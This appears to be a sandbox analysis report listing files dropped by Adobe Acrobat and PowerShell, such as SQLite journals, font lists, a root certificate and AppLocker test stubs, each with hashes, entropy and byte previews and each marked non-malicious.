                                                                                Category:dropped
                                                                                Size (bytes):86016
                                                                                Entropy (8bit):4.444756152409081
                                                                                Encrypted:false
                                                                                SSDEEP:384:Secci5tXiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:E8s3OazzU89UTTgUL
                                                                                MD5:EB0E4454111E27CE55E67FB0961E4ACA
                                                                                SHA1:201F3CB24C228D573E94FE07D533503DD4F74EB6
                                                                                SHA-256:14742336900FF83176FEDC38EA54097618F32A7D19943843AC6B78A6F58A825C
                                                                                SHA-512:69F0929B0293ED1305B0479D2234F4E68EF35681519195EF75A34A2031D1F158646CFA790AC6BCD394239E330899806FE0CE418B47A2F1C31A8EF340B6F097A2
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:SQLite Rollback Journal
                                                                                Category:dropped
                                                                                Size (bytes):8720
                                                                                Entropy (8bit):2.2120443901152376
                                                                                Encrypted:false
                                                                                SSDEEP:24:7+tff4nuwKkqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9s:7MonCkqvmFTIF3XmHjBoGGR+jMz+LhO
                                                                                MD5:EB1F7B554AE212D83A635F09036D1112
                                                                                SHA1:9A6996205335A52F5D13B30AACD8D6C31CD743FF
                                                                                SHA-256:56E8C7059EEA520ABE7CE6FF3D140C4B6BA0D1B7986A07E74213314F3A12DE1B
                                                                                SHA-512:98830A23B0D0B479C340A8E2EFA27D807EF30675D25ABF61BA5306752C14ED40F8A0A62634215D2FA2B1200F2BD0846CA45EF8815E86E89FA6C1F7A0A976FA24
                                                                                Malicious:false
                                                                                Preview:.... .c.....i.E.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:Certificate, Version=3
                                                                                Category:dropped
                                                                                Size (bytes):1391
                                                                                Entropy (8bit):7.705940075877404
                                                                                Encrypted:false
                                                                                SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                Malicious:false
                                                                                Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):192
                                                                                Entropy (8bit):2.7485180290352824
                                                                                Encrypted:false
                                                                                SSDEEP:3:kkFkl4UkM4NvfllXlE/HT8ki/zltNNX8RolJuRdxLlGB9lQRYwpDdt:kKhu4NQT8dzdNMa8RdWBwRd
                                                                                MD5:FA8BD2012632A17AAD12D8B8DB16BD88
                                                                                SHA1:F24D697CE21C15FA10161D8ED6B5D211E1B25ED4
                                                                                SHA-256:6CE68E2A8DD887D43C1F16299D7363B969CB8B1621CF0515CBC889C3DA1B3668
                                                                                SHA-512:532044D71A5C8DFE2604ED296139D8F25299077369730D96494F92E31CFF554B5F5DBDDCE09734CFE4939043279F2571F1F078CDDC3A2F88184252E23557AAC2
                                                                                Malicious:false
                                                                                Preview:p...... .........q..<...(....................................................... ..........W.....s..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.5912

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:PostScript document text
                                                                                Category:dropped
                                                                                Size (bytes):185099
                                                                                Entropy (8bit):5.182478651346149
                                                                                Encrypted:false
                                                                                SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                                MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                                SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                                SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                                SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                                Malicious:false
                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:PostScript document text
                                                                                Category:dropped
                                                                                Size (bytes):185099
                                                                                Entropy (8bit):5.182478651346149
                                                                                Encrypted:false
                                                                                SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                                MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                                SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                                SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                                SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                                Malicious:false
                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):4
                                                                                Entropy (8bit):0.8112781244591328
                                                                                Encrypted:false
                                                                                SSDEEP:3:e:e
                                                                                MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                Malicious:false
                                                                                Preview:....

                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):1969
                                                                                Entropy (8bit):5.046683615614264
                                                                                Encrypted:false
                                                                                SSDEEP:48:Y32sSbMSlMtCM5mMOpiMAW0MretMSMmkaMY:rtYtt55V6AWLre6JmkhY
                                                                                MD5:A69B82B68C54F2861E1CA37B8945A637
                                                                                SHA1:82A22553165DDD126FD543CD3B5422636DFF7DE4
                                                                                SHA-256:ADB2987862E32946B960C27E5037AB4D24484229FD17B482FCE6980DB2D9711B
                                                                                SHA-512:74F2AEA3134A034C5DFB7730E7FE9839ED4F84277F4B8B7BCC88A715DCA134E32C62A86CE018C497CA60E3A9E7102049D64A3C1FA7CF53D9EFA2BB32C67D0C97
                                                                                Malicious:false
                                                                                Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1727703017000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"23c88c8acf166d9fda5ae4d83df3db72","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696420889000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"d5fa85f4cf271b5fa75367efd1b392fa","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696420884000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c3af48ba3dee086edbbf20dff46c7ee0","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696333862000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"7101e009d8bf8920d0a3dd3f5dc75ebc","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696333862000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"8558394a527c224775253e57d0e3596a","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1230,"ts":1696333862000},{"id":"DC_Reader_RHP_Banner","info":{"dg":

                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                Category:dropped
                                                                                Size (bytes):12288
                                                                                Entropy (8bit):1.1891173993887652
                                                                                Encrypted:false
                                                                                SSDEEP:48:TGufl2GL7msEHUUUUUUUUCSvR9H9vxFGiDIAEkGVvpY:lNVmswUUUUUUUUC+FGSItk
                                                                                MD5:EFDC5C8151FDD732B9EDB05E59ECBD32
                                                                                SHA1:5FAE84725EB1E515D15ABECB9CE9518B45F11CD2
                                                                                SHA-256:34CFB0E81F0E9D32D356F02AE6496B672F69AC8E71BA0F47D2663766F9DF0232
                                                                                SHA-512:E698BD8AE9B25FBAC9ACA74FCD2DAE79C9981B1D1E87A20B642DED3AFDE9E48FE5D1AC47F2FC24E77C78FD5CC4D7B4DA3F93B4DA482CF99F8EF4E94176A8736A
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:SQLite Rollback Journal
                                                                                Category:dropped
                                                                                Size (bytes):8720
                                                                                Entropy (8bit):1.6076539371020728
                                                                                Encrypted:false
                                                                                SSDEEP:48:7MEKUUUUUUUUUUQvR9H9vxFGiDIAEkGVvEqFl2GL7ms6:7AUUUUUUUUUUoFGSIteKVms6
                                                                                MD5:64057846929EF25BAB98FFD5C17421B9
                                                                                SHA1:BC2B47994789387800C20E2BD1EFD8E1291A2B82
                                                                                SHA-256:FFBFB07FE8C477698C1A705F911F742A7CA0E4FB228457F714458647D48A6774
                                                                                SHA-512:04B39D09D717FE214B1F10F52DB15B3E3BA0F88022F17FF27BAB0C00B032BAA0A1795467F8EA1399C9C22A8283F1682D6E5C875566C44576133A4E7C7F4D9443
                                                                                Malicious:false
                                                                                Preview:.... .c......#........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):9434
                                                                                Entropy (8bit):4.928515784730612
                                                                                Encrypted:false
                                                                                SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                MD5:D3594118838EF8580975DDA877E44DEB
                                                                                SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                Malicious:false
                                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):64
                                                                                Entropy (8bit):0.34726597513537405
                                                                                Encrypted:false
                                                                                SSDEEP:3:Nlll:Nll
                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                Malicious:false
                                                                                Preview:@...e...........................................................

                                                                                C:\Users\user\AppData\Local\Temp\MSI94f19.LOG

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):246
                                                                                Entropy (8bit):3.5274671434738973
                                                                                Encrypted:false
                                                                                SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K87e69:Qw946cPbiOxDlbYnuRKI3
                                                                                MD5:0EB3EA23F6AA1F92438F2FE2D1593692
                                                                                SHA1:04985CA9C988F8647EB1A822A413C3350A05D176
                                                                                SHA-256:4A01B26C03AE11DCEF2C8A247E17B3E3727D33F19F1D2612D557DFABBD13AF08
                                                                                SHA-512:EF8B70336240849A4B20DEE01BED7B7434945D6603EE6C89236A85BCAAA6A33E5AA5991B8B461501D7E48CF48990373157DCF8178B3BA71F90B0CA0123319644
                                                                                Malicious:false
                                                                                Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .3.0./.0.9./.2.0.2.4. . .0.9.:.3.0.:.2.8. .=.=.=.....

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gwwgzgf.whw.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1twwtksc.o0g.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0yx0i10.mwy.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lidzqa2j.xa1.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3ofrp4k.uto.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y15y4gvz.z0g.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\acrobat_sbx\A91tjh1se_a3cio8_4k8.tmp

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                                                                Category:dropped
                                                                                Size (bytes):144514
                                                                                Entropy (8bit):7.992637131260696
                                                                                Encrypted:true
                                                                                SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                                                                MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                                                                SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                                                                SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                                                                SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                                                                Malicious:false
                                                                                Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

                                                                                C:\Users\user\AppData\Local\Temp\acrobat_sbx\A94vyju8_a3cioc_4k8.tmp

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                                                                Category:dropped
                                                                                Size (bytes):144514
                                                                                Entropy (8bit):7.992637131260696
                                                                                Encrypted:true
                                                                                SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                                                                MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                                                                SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                                                                SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                                                                SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                                                                Malicious:false
